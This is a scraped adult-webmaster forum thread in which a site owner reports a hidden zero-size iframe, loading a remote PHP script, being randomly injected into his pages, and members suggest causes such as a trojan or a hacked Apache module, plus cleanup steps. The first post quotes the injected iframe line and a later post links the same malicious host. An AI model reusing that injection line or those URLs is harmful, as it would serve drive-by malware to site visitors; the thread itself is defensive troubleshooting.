| 
		
			
			
				
			
			
				 
			
			
				
			
		 | 
		
			
			
				 
			
				
			
		 | 
	||||
| 
				Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.  You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us.  | 
		
		 
		![]()  | 
	
		
			
  | 	
	
	
		
		|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. | 
| 
		 | 
	Thread Tools | 
| 
			
			 | 
		#1 | 
| 
			
			
			
			 Registered User 
			
		
			
			
			Join Date: Sep 2002 
				
				
				
					Posts: 50
				 
				
				
				
				 | 
	
	
	
	
		
			
			 
				
				Site possibly got hacked
			 
			Hi, 
		
	
		
		
		
		
		
	
	I'm having some major problems with my site www.jamies-galleries.com . I am using Comus Thumbs and UCJ. This code: <iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe> is randomly added to my mainpages, I've checked my templates and the code is not there. I appears and dissapears every X minutes, doesn't seem like a pattern to me, just random. My host can't find anything on my server, and the author of Comus have checked too, he found nothing. I've added a firewall to my server which only allows me to access via FTP, I've also changed all my password - so there's no way anyone can get in manually. There has to be a script on the server somewhere, but can't find it ... I'm loosing traffic and prod as we speak, if anyone have any experience with the same stuff, please reply asap as I really need your help! Thanks for reading! Regards, Jamie  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#2 | 
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Feb 2004 
				Location: If i was up your ass you'd know 
				
				
					Posts: 3,695
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Trojan.Anicmoo 
		
	
		
		
		
		
			
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#3 | 
| 
			
			
			
			 Too lazy to set a custom title 
			
		
			
				
			
			
			Join Date: Jun 2003 
				Location: Jesusland 
				
				
					Posts: 10,017
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Don't click on that link unless you have some kind of AV running. 
		
	
		
		
		
		
			
				__________________ 
		
		
		
		
	
	War National Damn Champions Eagle  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#4 | |
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Aug 2004 
				Location: Toronto 
				
				
					Posts: 2,421
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Quote: 
	
 i should be fine ;)  | 
|
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#5 | 
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Aug 2004 
				Location: Toronto 
				
				
					Posts: 2,421
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 jamie do you use IE to edit comus thumbs pages? 
		
	
		
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#6 | 
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Jan 2005 
				
				
				
					Posts: 1,648
				 
				
				
				
				 | 
	
	|
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#7 | 
| 
			
			
			
			 I need a beer  
			
		
			
				
			
			
			![]() Industry Role:  
				Join Date: Jun 2002 
				Location: ♠ Toiletville ♠ 
				
				
					Posts: 133,949
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Relatively harmless..see that on a few sites..do a search ..there was a thread about your site awhile back 
		
	
		
		
		
		
			
				__________________ 
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#8 | 
| 
			
			
			
			 Confirmed User 
			
		
			
				
			
			
			Industry Role:  
				Join Date: Jul 2002 
				Location: Ottawa, Canada 
				
				
					Posts: 1,447
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Too bad Jamie. Same thing has happened to many others. TommysBookmarks too and I think he said the infection was right in apache on the server. 
		
	
		
		
		
		
			
				__________________ 
		
		
		
		
	
	Fcuk Cash - Backroom Casting Couch, ExCoGi, BlackAmbush DarkReach Cash - Top Pornstars & Sites Skype: robmurray999 Email: rob-at-paysitemanagers.com  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#9 | |
| 
			
			
			
			 Registered User 
			
		
			
			
			Join Date: Sep 2002 
				
				
				
					Posts: 50
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Quote: 
	
 Regarding what spunky said, I had a kinda same situation to my site a while back, but that was a security breach within comus, that got patched immediately. I take it the same hacker didn't entirely loose contact with my server and can still do shit too it. I did a search on GFY and found that thehun and sleazydream got attacked by the same stuff, can't get in touch with them unfortunately ... Any ideas on what todo / check? Thanks  | 
|
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#10 | 
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Jan 2005 
				
				
				
					Posts: 1,648
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 I read somewhere about a hacked up Apache module which inserts the code while serving the surfer the pages. 
		
	
		
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#11 | |
| 
			
			
			
			 Registered User 
			
		
			
			
			Join Date: Sep 2002 
				
				
				
					Posts: 50
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Quote: 
	
  | 
|
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#12 | 
| 
			
			
			
			 Registered User 
			
		
			
			
			Join Date: Sep 2002 
				
				
				
					Posts: 50
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Had my host check apache, he found nothing ... any other clues? I really need help on this! 
		
	
		
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#13 | 
| 
			
			
			
			 Choice is an Illusion 
			
		
			
				
			
			
			Industry Role:  
				Join Date: Feb 2005 
				Location: Land of Obama 
				
				
					Posts: 42,635
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 I had a similar problem when I first started my TGP but the problem was the page was going in the wrong directory. Simple and stupid I know, but I had to make sure to delete extra pages, and just keep the ../../whatever.shtml.  
		
	
		
		
		
		
			
		
		
		
		
	
	Basically what was happening was when it would do a page rebuild, it would use an older page, not the one with the code on it. So every 10-15 minutes I'd get an older version of the page, and through trial and error in the middle of the night found problem was just duplicates, and wrong directory.  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#14 | 
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Feb 2005 
				
				
				
					Posts: 6,780
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 theres a trojan  
		
	
		
		
		
		
			
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#15 | 
| 
			
			
			
			 Confirmed User 
			
		
			
				
			
			
			Industry Role:  
				Join Date: Apr 2003 
				Location: Quebec Calisse 
				
				
					Posts: 4,716
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 the worst is that guy isnt even doing some nice cash with that 
		
	
		
		
		
		
			
		
		
		
		
	
	http://iframedollars.biz/dl/stats.php?adv=adv514  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#16 | 
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Jan 2005 
				
				
				
					Posts: 1,648
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 I can't believe your host hasn't found the problem yet. 
		
	
		
		
		
		
		
	
	Bitchslap c h o o p a for me, I was gonna get a few servers from them last week!  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#18 | 
| 
			
			
			
			 i am a meat popsicle 
			
		
			
				
			
			
			Industry Role:  
				Join Date: Jan 2005 
				Location: Seattle, WA 
				
				
					Posts: 1,070
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 heya jamie, i know you said your host looked on your box to see what it is but the exploit is 99% for sure a module that was installed on Apache. Tell your host to look for mod_stats.so and see if it exists anywhere on the box and also check to see if it appears in your httpd.conf. i run a couple tgp's, and while i've been fortunate enough to not get hit by this, a good friend of mine has and that is what his hosting co ended up finding. 
		
	
		
		
		
		
		
	
	also, have your hosting co installed tripwire. it will do a reporte of any major files that were edited, so you can research things like this with a little more efficiency.  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#19 | 
| 
			
			
			
			 i am a meat popsicle 
			
		
			
				
			
			
			Industry Role:  
				Join Date: Jan 2005 
				Location: Seattle, WA 
				
				
					Posts: 1,070
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherintly insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend. 
		
	
		
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#20 | 
| 
			
			
			
			 Ryde or Die 
			
		
			
			
			Industry Role:  
				Join Date: Dec 2002 
				Location: California-Shanghai 
				
				
					Posts: 19,568
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Your hosting co sucks if they can't find the problem within apache. 
		
	
		
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#21 | |
| 
			
			
			
			 Registered User 
			
		
			
			
			Join Date: Sep 2002 
				
				
				
					Posts: 50
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Ok, I've got it confirmed many times now, there is not a problem with apache. 
		
	
		
		
		
		
		
	
	My host says, "the problem is not with apache, it is with the software that runs on apache". hahahahahaha has been working on it for a 2 days now. Quote: 
	
 Man this is giving me a headake  | 
|
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#22 | 
| 
			
			
			
			 Confirmed User 
			
		
			
				
			
			
			Join Date: Apr 2005 
				Location: Vancouver, BC 
				
				
					Posts: 3,685
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Get a NEW host! 
		
	
		
		
		
		
			
				__________________ 
		
		
		
		
	
	Rod Macdonald Mainstream Ad Agency Owner ICQ: 607306  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#23 | 
| 
			
			
			
			 Confirmed User 
			
		
			
				
			
			
			Join Date: Apr 2005 
				Location: Vancouver, BC 
				
				
					Posts: 3,685
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 If you want a kick ass host icq me! 
		
	
		
		
		
		
			
				__________________ 
		
		
		
		
	
	Rod Macdonald Mainstream Ad Agency Owner ICQ: 607306  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#24 | 
| 
			
			
			
			 Registered User 
			
		
			
			
			Join Date: Sep 2002 
				
				
				
					Posts: 50
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 MrVids, could you hit me up on icq: 162863896 , I just wanna ask you some questions, thanks! 
		
	
		
		
		
		
		
	
	 | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#25 | 
| 
			
			
			
			 ►SouthOfHeaven 
			
		
			
				
			
			
			Join Date: Jun 2004 
				Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer 
				
				
					Posts: 28,609
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 hmmmmmm m 
		
	
		
		
		
		
			
				__________________ 
		
		
		
		
		
			
		
		
	
	hatisblack at yahoo.com  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#26 | 
| 
			
			
			
			 Confirmed User 
			
		
			
				
			
			
			Industry Role:  
				Join Date: Jul 2002 
				Location: Ottawa, Canada 
				
				
					Posts: 1,447
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Maybe your box was rooted. Check in any /tmp for anything owned by root. I also read that your root crontab for the html generator is a way a hacker might have gained access. 
		
	
		
		
		
		
			
				__________________ 
		
		
		
		
	
	Fcuk Cash - Backroom Casting Couch, ExCoGi, BlackAmbush DarkReach Cash - Top Pornstars & Sites Skype: robmurray999 Email: rob-at-paysitemanagers.com  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 | 
| 
			
			 | 
		#27 | 
| 
			
			
			
			 Confirmed User 
			
		
			
			
			Join Date: Jan 2005 
				
				
				
					Posts: 1,648
				 
				
				
				
				 | 
	
	
	
	
		
		
		
		 Seriously though, once you're hacked, you gotta format the server and re-installing everything. 
		
	
		
		
		
		
		
	
	No doubt he's already installed a rootkit so you'll never be able to get rid of him.  | 
| 
		 | 
	
	
	
		
                 
		
		
		
		
		
		
		
			
			
		
	 |